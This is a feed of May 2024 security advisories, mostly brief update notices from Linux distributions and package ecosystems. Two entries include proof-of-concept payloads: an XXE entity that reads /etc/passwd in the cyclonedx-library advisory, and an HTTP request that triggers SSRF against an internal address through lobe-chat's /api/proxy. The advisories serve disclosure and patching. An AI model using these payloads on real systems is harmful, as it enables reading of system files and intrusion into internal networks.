05.05.2024 14:33:22	suse	[SUSE-SU-2024:1493-1] Security update for the Linux Kernel (Live Patch 42 for SLE 15 SP2) (important)	Security update for the Linux Kernel (Live Patch 42 for SLE 15 SP2)	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1493-1
08.05.2024 23:42:00	go	[GO-2024-2819] Denial of Service in github.com/ethereum/go-ethereum (high)	A vulnerable node can be made to consume very large amounts of memory whenhandling specially crafted p2p messages sent from an attacker node. This canresult in a denial of service as the node runs out of memory.	https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2819
08.05.2024 22:55:37	npm	[NPM:GHSA-38GF-RH2W-GMJ7] @cyclonedx/cyclonedx-library Improper Restriction of XML External Entity Reference vulnerability (high)	### ImpactXML External entity injections could be possible, when running the provided XML Validator on arbitrary input.#### POC```jsconst { Spec: { Version }, Validation: { XmlValidator }} = require('@cyclonedx/cyclonedx-library');const version = Version.v1dot5;const validator = new XmlValidator(version);const input = `<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE poc [ <!ENTITY xxe SYSTEM "file:///etc/passwd">]><bom xmlns="http://cyclonedx.org/schema/bom/1.5"> <components> <component type="library"> <name>testing</name> <version>1.337</version> <licenses> <license> <id>&xxe;</id><!-- << XML external entity (XXE) injection --> </license> </licenses> </component> </components></bom>`;// validating this forged(^) input might lead to unintended behaviour// for the fact that the XML external entity would be taken into account.validator.validate(input).then(ve => { console.error('validation error', ve);});```### PatchesThis issue was fixed in `@cyclonedx/cyclonedx-library@6.7.1 `.### WorkaroundsDo not run the provided XML validator on untrusted inputs.### References* issue was introduced via <https://github.com/CycloneDX/cyclonedx-javascript-library/pull/1063>.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-38GF-RH2W-GMJ7
08.05.2024 22:57:07	maven	[MAVEN:GHSA-FGH3-PWMP-3QW3] Apache Inlong Deserialization of Untrusted Data vulnerability (high)	Deserialization of Untrusted Data vulnerability in Apache InLong. This issue affects Apache InLong: from 1.7.0 through 1.11.0. The attackers can bypass using malicious parameters.Users are advised to upgrade to Apache InLong's 1.12.0 or cherry-pick [1], [2] to solve it.[1] https://github.com/apache/inlong/pull/9694 [2] https://github.com/apache/inlong/pull/9707	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-FGH3-PWMP-3QW3
08.05.2024 08:25:20	go	[GO-2024-2818] Consensus failures in github.com/btcsuite/btcd	Incorrect implementation of the consensus rules outlined in BIP 68 and BIP 112making btcd susceptible to consensus failures. Specifically, it uses thetransaction version as a signed integer when it is supposed to be treated asunsigned. There can be a chain split and loss of funds.	https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2818
08.05.2024 03:00:00	debian	[DSA-5684-1] webkit2gtk (high)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5684-1
08.05.2024 03:00:00	debian	[DSA-5685-1] wordpress (high)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5685-1
08.05.2024 03:00:00	debian	[DSA-5683-1] chromium	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5683-1
08.05.2024 03:00:00	gentoo	[GLSA-202405-26] qtsvg: Multiple Vulnerabilities (normal)	Multiple vulnerabilities have been discovered in qtsvg, the worst of which could lead to a denial of service.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202405-26
08.05.2024 03:00:00	gentoo	[GLSA-202405-21] Commons-BeanUtils: Improper Access Restriction (normal)	A vulnerability has been discovered in Commons-BeanUtils, which could lead to execution of arbitrary code.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202405-21
08.05.2024 03:00:00	gentoo	[GLSA-202405-22] rsync: Multiple Vulnerabilities (normal)	Multiple vulnerabilities have been discovered in rsync, the worst of which can lead to denial of service or information disclosure.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202405-22
08.05.2024 03:00:00	gentoo	[GLSA-202405-23] U-Boot tools: double free vulnerability (normal)	A vulnerability has been discovered in U-Boot tools which can lead to execution of arbitary code.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202405-23
08.05.2024 03:00:00	gentoo	[GLSA-202405-24] ytnef: Multiple Vulnerabilities (normal)	Multiple vulnerabilities have been discovered in ytnef, the worst of which could potentially lead to remote code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202405-24
08.05.2024 03:00:00	gentoo	[GLSA-202405-25] MariaDB: Multiple Vulnerabilities (normal)	Multiple vulnerabilities have been discovered in MariaDB, the worst fo which can lead to arbitrary execution of code.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202405-25
08.05.2024 03:00:00	gentoo	[GLSA-202405-27] Epiphany: Buffer Overflow (normal)	A vulnerability has been discovered in Epiphany, which can lead to a buffer overflow.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202405-27
08.05.2024 03:00:00	gentoo	[GLSA-202405-28] NVIDIA Drivers: Multiple Vulnerabilities (normal)	Multiple vulnerabilities have been discovered in NVIDIA Drivers, the worst of which could result in root privilege escalation.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202405-28
08.05.2024 03:00:00	gentoo	[GLSA-202405-29] Node.js: Multiple Vulnerabilities (low)	Multiple vulnerabilities have been discovered in Node.js.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202405-29
08.05.2024 00:05:52	go	[GO-2024-2825] Arbitrary code execution during build on Darwin in cmd/go	On Darwin, building a Go module which contains CGO can trigger arbitrary codeexecution when using the Apple version of ld, due to usage of the -lto_libraryflag in a "#cgo LDFLAGS" directive.	https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2825
08.05.2024 22:52:53	go	[GO-2024-2824] Malformed DNS message can cause infinite loop in net	A malformed DNS message in response to a query can cause the Lookup functions toget stuck in an infinite loop.	https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2824
08.05.2024 21:59:10	maven	[MAVEN:GHSA-VPW3-3PRF-3974] Apache Hive Code Injection vulnerability (moderate)	Improper Control of Generation of Code ('Code Injection') vulnerability in Apache Hive.The vulnerability affects the Hive JDBC driver component and it can potentially lead to arbitrary code execution on the machine/endpoint that the JDBC driver (client) is running. The malicious user must have sufficient permissions to specify/edit JDBC URL(s) in an endpoint relying on the Hive JDBC driver and the JDBC client process must run under a privileged user to fully exploit the vulnerability. The attacker can setup a malicious HTTP server and specify a JDBC URL pointing towards this server. When a JDBC connection is attempted, the malicious HTTP server can provide a special response with customized payload that can trigger the execution of certain commands in the JDBC client.This issue affects Apache Hive: from 4.0.0-alpha-1 before 4.0.0.Users are recommended to upgrade to version 4.0.0, which fixes the issue.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-VPW3-3PRF-3974
08.05.2024 03:00:00	freebsd	[FREEBSD:059A99A9-45E0-492B-B9F9-5A79573C8EB6] electron29 -- multiple vulnerabilities	Electron developers report: This update fixes the following vulnerabilities: Security: backported fix for CVE-2024-4060. Security: backported fix for CVE-2024-4058.	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:059A99A9-45E0-492B-B9F9-5A79573C8EB6
10.05.2024 23:17:50	go	[GO-2024-2800] Argument injection when fetching remote default Git branches in github.com/hashicorp/go-getter (critical)	When go-getter is performing a Git operation, go-getter will try to clone thegiven repository. If a Git reference is not passed along with the Git url,go-getter will then try to check the remote repository's HEAD reference of itsdefault branch by passing arguments to the Git binary on the host it isexecuting on.An attacker may format a Git URL in order to inject additional Git arguments tothe Git call.	https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2800
10.05.2024 23:10:50	go	[GO-2024-2638] ValidateVoteExtensions function in Cosmos SDK may allow incorrect votingpower assumptions in github.com/cosmos/cosmos-sdk	The default ValidateVoteExtensions helper function infers total voting powerbased on the injected VoteExtension, which are injected by the proposer.If your chain utilizes the ValidateVoteExtensions helper in ProcessProposal, adishonest proposer can potentially mutate voting power of each validator itincludes in the injected VoteExtension, which could have potentially unexpectedor negative consequences on modified state. Additional validation on injectedVoteExtension data was added to confirm voting power against the state machine.	https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2638
10.05.2024 22:15:01	go	[GO-2024-2826] Denial of service attack by triggering unbounded memory usage invitess.io/vitess (medium)	When executing a query, the vtgate will go into an endlessloop that also keeps consuming memory and eventually will OOM.This causes a denial of service.	https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2826
10.05.2024 18:29:53	npm	[NPM:GHSA-MXHQ-XW3G-RPHC] lobe-chat `/api/proxy` endpoint Server-Side Request Forgery vulnerability (critical)	### SummaryThe latest version of lobe-chat(by now v0.141.2) has an unauthorized ssrf vulnerability. An attacker can construct malicious requests to cause SSRF without logging in, attack intranet services, and leak sensitive information.### Details* visit https://chat-preview.lobehub.com/settings/agent * you can attack all internal services by /api/proxy and get the echo in http response 🙂 ![image](https://github.com/lobehub/lobe-chat/assets/55245002/c2894c34-7333-4ae1-864c-3b212b95eb21)![image](https://github.com/lobehub/lobe-chat/assets/55245002/dd9ad696-7180-4700-8bff-1171a6a8ac91)![image](https://github.com/lobehub/lobe-chat/assets/55245002/e2b97520-a6d5-4939-8313-46db8a1c4b75)### PoC```httpPOST /api/proxy HTTP/2Host: xxxxxxxxxxxxxxxxxCookie: LOBE_LOCALE=zh-CN; LOBE_THEME_PRIMARY_COLOR=undefined; LOBE_THEME_NEUTRAL_COLOR=undefined; _ga=GA1.1.86608329.1711346216; _ga_63LP1TV70T=GS1.1.1711346215.1.1.1711346846.0.0.0Content-Length: 23Sec-Ch-Ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"Sec-Ch-Ua-Platform: "Windows"Sec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Content-Type: text/plain;charset=UTF-8Accept: /Origin: https://chat-preview.lobehub.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://chat-preview.lobehub.com/settings/agentAccept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,ja;q=0.7http://172.23.0.1:8000/```### ImpactSSRF ,All users will be impacted.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-MXHQ-XW3G-RPHC
10.05.2024 17:34:31	rockylinux	[RLSA-2024:1427] libreoffice security update (important)	An update is available for libreoffice.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:1427
10.05.2024 17:34:31	rockylinux	[RLBA-2023:7750] xfsdump bug fix and enhancement update (none)	An update is available for xfsdump.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2023:7750
10.05.2024 17:34:23	rockylinux	[RLBA-2023:6386] clevis bug fix and enhancement update (none)	An update is available for clevis.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2023:6386
10.05.2024 17:34:23	rockylinux	[RLBA-2023:6393] python-into-dbus-python bug fix and enhancement update (none)	An update is available for python-into-dbus-python.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2023:6393
10.05.2024 17:34:23	rockylinux	[RLBA-2023:6439] gcc-toolset-13 bug fix and enhancement update (none)	An update is available for gcc-toolset-13.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2023:6439
10.05.2024 17:34:23	rockylinux	[RLBA-2023:6509] libcanberra bug fix and enhancement update (none)	An update is available for libcanberra.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2023:6509
10.05.2024 17:34:23	rockylinux	[RLSA-2023:6539] perl-CPAN security update (moderate)	An update is available for perl-CPAN.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2023:6539
10.05.2024 17:34:23	rockylinux	[RLSA-2024:1139] keylime security update (low)	An update is available for keylime.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:1139
10.05.2024 17:34:24	rockylinux	[RLSA-2024:1502] grafana-pcp security update (important)	An update is available for grafana-pcp.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:1502
10.05.2024 17:34:24	rockylinux	[RLBA-2024:2058] nss bug fix update (none)	An update is available for nss.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2058
10.05.2024 17:34:23	rockylinux	[RLSA-2023:7712] tracker-miners security update (important)	An update is available for tracker-miners.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2023:7712
10.05.2024 17:34:23	rockylinux	[RLSA-2024:0675] gimp security update (important)	An update is available for gimp.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:0675
10.05.2024 17:34:23	rockylinux	[RLSA-2024:1436] postgresql-jdbc security update (important)	An update is available for postgresql-jdbc.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:1436
10.05.2024 17:34:24	rockylinux	[RLSA-2024:1908] firefox security update (important)	An update is available for firefox.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:1908
10.05.2024 17:34:24	rockylinux	[RLSA-2024:1940] thunderbird security update (low)	An update is available for thunderbird.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:1940
10.05.2024 17:34:24	rockylinux	[RLBA-2024:2087] container-selinux bug fix update (none)	An update is available for container-selinux.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2087
10.05.2024 17:34:24	rockylinux	[RLBA-2024:2124] crun bug fix and enhancement update (none)	An update is available for crun.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2124
10.05.2024 17:34:24	rockylinux	[RLBA-2024:2140] netavark bug fix and enhancement update (none)	An update is available for netavark.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2140
10.05.2024 17:34:24	rockylinux	[RLBA-2024:2150] python-virt-firmware bug fix and enhancement update (none)	An update is available for python-virt-firmware.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2150
10.05.2024 17:34:25	rockylinux	[RLBA-2024:2155] python-drgn bug fix and enhancement update (none)	An update is available for python-drgn.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2155
10.05.2024 17:34:24	rockylinux	[RLSA-2024:2135] qemu-kvm security update (moderate)	An update is available for qemu-kvm.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:2135
10.05.2024 17:34:25	rockylinux	[RLBA-2024:2168] libva bug fix and enhancement update (none)	An update is available for libva.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2168
10.05.2024 17:34:25	rockylinux	[RLBA-2024:2189] systemtap bug fix and enhancement update (none)	An update is available for systemtap.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2189
10.05.2024 17:34:25	rockylinux	[RLBA-2024:2194] lorax bug fix and enhancement update (none)	An update is available for lorax.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2194
10.05.2024 17:34:25	rockylinux	[RLBA-2024:2195] checkpolicy bug fix and enhancement update (none)	An update is available for checkpolicy.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2195
10.05.2024 17:34:25	rockylinux	[RLBA-2024:2192] mstflint bug fix and enhancement update (none)	An update is available for mstflint.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2192
10.05.2024 17:34:25	rockylinux	[RLBA-2024:2224] cmake bug fix and enhancement update (none)	An update is available for cmake.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2224
10.05.2024 17:34:25	rockylinux	[RLEA-2024:2221] gcc-toolset-13-annobin bug fix and enhancement update (none)	An update is available for gcc-toolset-13-annobin.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLEA-2024:2221
10.05.2024 17:34:25	rockylinux	[RLBA-2024:2220] ipa-healthcheck bug fix and enhancement update (none)	An update is available for ipa-healthcheck.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2220
10.05.2024 17:34:25	rockylinux	[RLBA-2024:2227] rhel-system-roles bug fix and enhancement update (none)	An update is available for rhel-system-roles.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2227
10.05.2024 17:34:25	rockylinux	[RLBA-2024:2240] git bug fix and enhancement update (none)	An update is available for git.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2240
10.05.2024 17:34:26	rockylinux	[RLBA-2024:2251] resteasy bug fix and enhancement update (none)	An update is available for resteasy.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2251
10.05.2024 17:34:26	rockylinux	[RLBA-2024:2248] gtk4 bug fix and enhancement update (none)	An update is available for gtk4.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2248
10.05.2024 17:34:26	rockylinux	[RLBA-2024:2249] debugedit bug fix and enhancement update (none)	An update is available for debugedit.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2249
10.05.2024 17:34:26	rockylinux	[RLBA-2024:2250] pki-core bug fix and enhancement update (none)	An update is available for pki-core.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2250
10.05.2024 17:34:26	rockylinux	[RLBA-2024:2265] NetworkManager-libreswan bug fix and enhancement update (none)	An update is available for NetworkManager-libreswan.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2265
10.05.2024 17:34:26	rockylinux	[RLBA-2024:2271] conmon bug fix and enhancement update (none)	An update is available for conmon.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2271
10.05.2024 17:34:27	rockylinux	[RLBA-2024:2267] passt bug fix and enhancement update (none)	An update is available for passt.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2267
10.05.2024 17:34:27	rockylinux	[RLBA-2024:2281] virtio-win bug fix and enhancement update (none)	An update is available for virtio-win.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2281
10.05.2024 17:34:27	rockylinux	[RLSA-2024:2278] httpd security update (moderate)	An update is available for httpd.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:2278
10.05.2024 17:34:27	rockylinux	[RLBA-2024:2284] pipewire bug fix and enhancement update (none)	An update is available for pipewire.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2284
10.05.2024 17:34:27	rockylinux	[RLBA-2024:2283] rear bug fix update (none)	An update is available for rear.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2283
10.05.2024 17:34:27	rockylinux	[RLBA-2024:2291] boom-boot bug fix and enhancement update (none)	An update is available for boom-boot.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2291
10.05.2024 17:34:27	rockylinux	[RLBA-2024:2306] tomcat bug fix and enhancement update (none)	An update is available for tomcat.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2306
10.05.2024 17:34:27	rockylinux	[RLBA-2024:2312] python3.12-lxml bug fix and enhancement update (none)	An update is available for python3.12-lxml.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2312
10.05.2024 17:34:27	rockylinux	[RLSA-2024:2302] gstreamer1-plugins-base security update (moderate)	An update is available for gstreamer1-plugins-base.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:2302
10.05.2024 17:34:27	rockylinux	[RLBA-2024:2314] python3.12-cffi bug fix and enhancement update (none)	An update is available for python3.12-cffi.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2314
10.05.2024 17:34:27	rockylinux	[RLBA-2024:2311] python3.12-mod_wsgi bug fix and enhancement update (none)	An update is available for python3.12-mod_wsgi.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2311
10.05.2024 17:34:27	rockylinux	[RLBA-2024:2325] python3.12-pycparser bug fix and enhancement update (none)	An update is available for python3.12-pycparser.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2325
10.05.2024 17:34:27	rockylinux	[RLBA-2024:2326] autoconf bug fix and enhancement update (none)	An update is available for autoconf-latest.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2326
10.05.2024 17:34:28	rockylinux	[RLBA-2024:2329] mingw-qemu-ga-win bug fix and enhancement update (none)	An update is available for mingw-qemu-ga-win.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2329
10.05.2024 17:34:28	rockylinux	[RLSA-2024:2337] python3.11-cryptography security update (moderate)	An update is available for python3.11-cryptography.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:2337
10.05.2024 17:34:28	rockylinux	[RLBA-2024:2335] wireguard-tools bug fix and enhancement update (none)	An update is available for wireguard-tools.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2335
10.05.2024 17:34:28	rockylinux	[RLBA-2024:2338] virtiofsd bug fix and enhancement update (none)	An update is available for virtiofsd.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2338
10.05.2024 17:34:28	rockylinux	[RLEA-2024:2351] rust-afterburn bug fix and enhancement update (none)	An update is available for rust-afterburn.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLEA-2024:2351
10.05.2024 17:34:28	rockylinux	[RLBA-2024:2354] certmonger bug fix and enhancement update (none)	An update is available for certmonger.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2354
10.05.2024 17:34:28	rockylinux	[RLBA-2024:2352] libfprint bug fix and enhancement update (none)	An update is available for libfprint.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2352
10.05.2024 17:34:28	rockylinux	[RLBA-2024:2362] squid bug fix and enhancement update (none)	An update is available for squid.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2362
10.05.2024 17:34:28	rockylinux	[RLBA-2024:2361] cyrus-imapd bug fix and enhancement update (none)	An update is available for cyrus-imapd.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2361
